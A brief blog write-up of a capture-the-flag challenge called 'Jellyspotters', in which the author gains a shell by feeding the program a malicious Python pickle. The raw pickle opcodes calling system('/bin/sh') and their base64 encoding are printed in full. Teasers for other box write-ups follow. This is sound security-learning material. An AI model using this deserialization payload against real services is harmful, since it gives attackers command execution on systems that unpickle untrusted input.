tsustyle

Red Team Aspirant

Jellyspotters

less than 1 minute read

img

img

The interesting function is import

Breaking the import function gives us an error

img

So it wants a base64 encoded pickle object and we need to read the flag. Let’s get a shell using a malicious pickle object.

reading: https://checkoway.net/musings/pickle/

cos
system
(S'/bin/sh'
tR.

base64 encoding that gives us

Y29zCnN5c3RlbQooUycvYmluL3NoJwp0Ui4=

and passing that to the program…

img

You may also enjoy

Tenet

‘Tenet’ is a medium rated box on Hack the Box. We’ll be using PHP Object Injection to get RCE and identify a race condition in a custom script for privesc.

Skynet

‘Skynet’ is a box on TryHackMe. We’ll be enumerating SMB shares, brute forcing a login and exploiting a Remote File Inclusion vulnerability in Cuppa CMS for a foothold. For our root shell we’ll take a look at exploiting some wildcard injection using a script that’s being run as a cronjob.

FFuF Cheatsheet

This is a Cheatsheet I created for reference when using FFuF

Ready

‘Ready’ is a medium rated box on Hack the Box. We’ll be using a public exploit for a vulnerable Gitlab version for a shell, enumeration and password reuse for privesc and escape a docker container for root